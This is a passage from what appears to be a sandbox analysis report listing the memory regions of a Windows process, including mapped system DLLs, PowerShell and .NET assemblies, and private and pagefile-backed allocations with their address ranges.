(normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 2905 start_va = 0x74bd0000 end_va = 0x74d6dfff entry_point = 0x74bd0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 2906 start_va = 0x75b10000 end_va = 0x75b54fff entry_point = 0x75b10000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 2907 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2908 start_va = 0x200000 end_va = 0x203fff entry_point = 0x200000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 2909 start_va = 0x210000 end_va = 0x22ffff entry_point = 0x210000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000018.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db") Region: id = 2910 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 2911 start_va = 0x75520000 end_va = 0x75531fff entry_point = 0x75520000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 2912 start_va = 0x75d70000 end_va = 0x75f0cfff entry_point = 0x75d70000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 2913 start_va = 0x762c0000 end_va = 0x762e6fff entry_point = 0x762c0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 2914 start_va = 0x20a0000 end_va = 0x219ffff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 2915 start_va = 0x21a0000 end_va = 0x2592fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021a0000" filename = "" Region: id = 2916 start_va = 0x2650000 end_va = 0x268ffff entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 2917 start_va = 0x2750000 end_va = 0x278ffff entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 2918 start_va = 0x74a30000 end_va = 0x74a7bfff entry_point = 0x74a30000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2919 start_va = 0x74e70000 end_va = 0x74e9dfff entry_point = 0x74e70000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll") Region: id = 2920 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 2921 start_va = 0x749a0000 end_va = 0x749a8fff entry_point = 0x749a0000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 2922 start_va = 0x200000 end_va = 0x203fff entry_point = 0x200000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2923 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2924 start_va = 0x340000 end_va = 0x36ffff entry_point = 0x340000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db") Region: id = 2925 start_va = 0x25a0000 end_va = 0x2605fff entry_point = 0x25a0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 2926 start_va = 0x74930000 end_va = 0x7499ffff entry_point = 0x74930000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 2927 start_va = 0x74910000 end_va = 0x74928fff entry_point = 0x74910000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 2928 start_va = 0x27e0000 end_va = 0x281ffff entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 2929 start_va = 0x2840000 end_va = 0x287ffff entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 2930 start_va = 0x74900000 end_va = 0x7490afff entry_point = 0x74900000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 2931 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 2932 start_va = 0x748f0000 end_va = 0x748f9fff entry_point = 0x748f0000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 2933 start_va = 0x749c0000 end_va = 0x749fafff entry_point = 0x749c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2934 start_va = 0x74bb0000 end_va = 0x74bc5fff entry_point = 0x74bb0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 2935 start_va = 0x74870000 end_va = 0x748e7fff entry_point = 0x74870000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 2936 start_va = 0x74a20000 end_va = 0x74a28fff entry_point = 0x74a20000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2937 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 2938 start_va = 0x29e0000 end_va = 0x2a1ffff entry_point = 0x0 region_type = private name = "private_0x00000000029e0000" filename = "" Region: id = 2939 start_va = 0x2bc0000 end_va = 0x2bcffff entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 2940 start_va = 0x732b0000 end_va = 0x7385afff entry_point = 0x732b0000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 2941 start_va = 0x747d0000 end_va = 0x7486afff entry_point = 0x747d0000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll") Region: id = 2943 start_va = 0x2e0000 end_va = 0x2e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 2944 start_va = 0x2f0000 end_va = 0x2f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 2945 start_va = 0x1c70000 end_va = 0x1c7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 2946 start_va = 0x1c80000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 2947 start_va = 0x1c90000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 2948 start_va = 0x1ca0000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001ca0000" filename = "" Region: id = 2949 start_va = 0x1cf0000 end_va = 0x1cfffff entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Region: id = 2950 start_va = 0x1d00000 end_va = 0x1d0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 2951 start_va = 0x2690000 end_va = 0x272ffff entry_point = 0x0 region_type = private name = "private_0x0000000002690000" filename = "" Region: id = 2952 start_va = 0x28c0000 end_va = 0x28fffff entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 2953 start_va = 0x2960000 end_va = 0x299ffff entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 2954 start_va = 0x2a80000 end_va = 0x2abffff entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 2955 start_va = 0x2ae0000 end_va = 0x2b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 2956 start_va = 0x2bd0000 end_va = 0x4bcffff entry_point = 0x0 region_type = private name = "private_0x0000000002bd0000" filename = "" Region: id = 2957 start_va = 0x727b0000 end_va = 0x732a7fff entry_point = 0x727b0000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll") Region: id = 2958 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 2959 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 2960 start_va = 0x1d50000 end_va = 0x1d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 2961 start_va = 0x4bd0000 end_va = 0x4eb1fff entry_point = 0x4bd0000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 2962 start_va = 0x72010000 end_va = 0x727abfff entry_point = 0x72010000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll") Region: id = 2963 start_va = 0x74ea0000 end_va = 0x74f20fff entry_point = 0x74ea0000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\microsoft.powershell.consolehost.ni.dll") Region: id = 2964 start_va = 0x71790000 end_va = 0x72009fff entry_point = 0x71790000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4436815b432c313255af322f4ec3560d\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\4436815b432c313255af322f4ec3560d\\system.management.automation.ni.dll") Region: id = 2965 start_va = 0x73a30000 end_va = 0x73d11fff entry_point = 0x73a30000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 2966 start_va = 0x73a30000 end_va = 0x73d11fff entry_point = 0x73a30000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 2967 start_va = 0x1d60000 end_va = 0x1d62fff entry_point = 0x1d60000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\SysWOW64\\l_intl.nls" (normalized: "c:\\windows\\syswow64\\l_intl.nls") Region: id = 2968 start_va = 0x4ec0000 end_va = 0x4f7ffff entry_point = 0x4ec0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2969 start_va = 0x75380000 end_va = 0x75384fff entry_point = 0x75380000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 2974 start_va = 0x2050000 end_va = 0x2050fff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 2975 start_va = 0x2610000 end_va = 0x2614fff entry_point = 0x2610000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 2976 start_va = 0x2790000 end_va = 0x27d0fff entry_point = 0x2790000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 2977 start_va = 0x73a30000 end_va = 0x73d11fff entry_point = 0x73a30000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 2978 start_va = 0x73a30000 end_va = 0x73d11fff entry_point = 0x73a30000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 3100 start_va = 0x2620000 end_va = 0x2627fff entry_point = 0x2620000 region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 3101 start_va = 0x2630000 end_va = 0x2630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002630000" filename = "" Region: id = 3102 start_va = 0x2900000 end_va = 0x2942fff entry_point = 0x2900000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 3103 start_va = 0x67aa0000 end_va = 0x67ae2fff entry_point = 0x67aa0000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 3104 start_va = 0x74220000 end_va = 0x742bbfff entry_point = 0x74220000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll") Region: id = 3105 start_va = 0x742c0000 end_va = 0x744f4fff entry_point = 0x742c0000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll") Region: id = 3106 start_va = 0x74740000 end_va = 0x747c4fff entry_point = 0x74740000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\ee28a075665b6bc23b6dae56903d431d\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\ee28a075665b6bc23b6dae56903d431d\\microsoft.wsman.management.ni.dll") Region: id = 3107 start_va = 0x74e10000 end_va = 0x74e34fff entry_point = 0x74e10000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll") Region: id = 3108 start_va = 0x74e50000 end_va = 0x74e9afff entry_point = 0x74e50000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4f68cd04686e5dc5a55070d112d44bdf\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4f68cd04686e5dc5a55070d112d44bdf\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 3114 start_va = 0x2640000 end_va = 0x2640fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002640000" filename = "" Region: id = 3115 start_va = 0x60340000 end_va = 0x60347fff entry_point = 0x60340000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll") Region: id = 3116 start_va = 0x73f80000 end_va = 0x73facfff entry_point = 0x73f80000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8ce205027e30804d1b2deaffa0582735\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8ce205027e30804d1b2deaffa0582735\\microsoft.powershell.security.ni.dll") Region: id = 3117 start_va = 0x73fb0000 end_va = 0x74072fff entry_point = 0x73fb0000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8df695fb80187f65208d87229e81e8a2\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8df695fb80187f65208d87229e81e8a2\\microsoft.powershell.commands.management.ni.dll") Region: id = 3118 start_va = 0x74080000 end_va = 0x7421dfff entry_point = 0x74080000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\3008a05e2928e2c1d856cc34e0422c17\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\3008a05e2928e2c1d856cc34e0422c17\\microsoft.powershell.commands.utility.ni.dll") Region: id = 3131 start_va = 0x2640000 end_va = 0x264ffff entry_point = 0x0 region_type = private name = "private_0x0000000002640000" filename = "" Region: id = 3132 start_va = 0x2a20000 end_va = 0x2a73fff entry_point = 0x2a20000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll") Region: id = 3133 start_va = 0x71250000 end_va = 0x71785fff entry_point = 0x71250000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll") Region: id = 3134 start_va = 0x73d50000 end_va = 0x73e63fff entry_point = 0x73d50000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll") Region: id = 3135 start_va = 0x73e70000 end_va = 0x73f73fff entry_point = 0x73e70000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll") Region: id = 3136 start_va = 0x74df0000 end_va = 0x74df4fff entry_point = 0x74df0000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 3499 start_va = 0x2730000 end_va = 0x2740fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002730000" filename = "" Region: id = 3500 start_va = 0x2820000 end_va = 0x282ffff entry_point = 0x0 region_type = private name = "private_0x0000000002820000" filename = "" Region: id = 3501 start_va = 0x2830000 end_va = 0x283ffff entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 3502 start_va = 0x2880000 end_va = 0x288ffff entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 3503 start_va = 0x2890000 end_va = 0x289ffff entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 3504 start_va = 0x28a0000 end_va = 0x28affff entry_point = 0x0 region_type = private name = "private_0x00000000028a0000" filename = "" Region: id = 3505 start_va = 0x28b0000 end_va = 0x28bffff entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 3506 start_va = 0x2950000 end_va = 0x295ffff entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 3507 start_va = 0x29a0000 end_va = 0x29affff entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 3508 start_va = 0x74a10000 end_va = 0x74a17fff entry_point = 0x74a10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3521 start_va = 0x2b20000 end_va = 0x2b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b20000" filename = "" Region: id = 3537 start_va = 0x29b0000 end_va = 0x29bffff entry_point = 0x0 region_type = private name = "private_0x00000000029b0000" filename = "" Region: id = 3538 start_va = 0x29c0000 end_va = 0x29c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029c0000" filename = "" Region: id = 3539 start_va = 0x4f80000 end_va = 0x5251fff entry_point = 0x4f80000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 3540 start_va = 0x64e70000 end_va = 0x65141fff entry_point = 0x64e70000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 3541 start_va = 0x70bf0000 end_va = 0x71240fff entry_point = 0x70bf0000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Data\\1e85062785e286cd9eae9c26d2c61f73\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.data\\1e85062785e286cd9eae9c26d2c61f73\\system.data.ni.dll") Region: id = 3542 start_va = 0x758b0000 end_va = 0x758e4fff entry_point = 0x758b0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3543 start_va = 0x759e0000 end_va = 0x759ebfff entry_point = 0x759e0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 3544 start_va = 0x76650000 end_va = 0x7676cfff entry_point = 0x76650000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 3545 start_va = 0x77790000 end_va = 0x77795fff entry_point = 0x77790000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3555 start_va = 0x29d0000 end_va = 0x29dffff entry_point = 0x0 region_type = private name = "private_0x00000000029d0000" filename = "" Region: id = 3556 start_va = 0x2ac0000 end_va = 0x2ac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ac0000" filename = "" Region: id = 3557 start_va = 0x739d0000 end_va = 0x73a2afff entry_point = 0x739d0000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll") Region: id = 3561 start_va = 0x2ad0000 end_va = 0x2adffff entry_point = 0x0 region_type = private name = "private_0x0000000002ad0000" filename = "" Region: id = 3562 start_va = 0x2ba0000 end_va = 0x2baffff entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 3568 start_va = 0x2bb0000 end_va = 0x2bbffff entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 3569 start_va = 0x5260000 end_va = 0x5260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005260000" filename = "" Region: id = 3570 start_va = 0x5360000 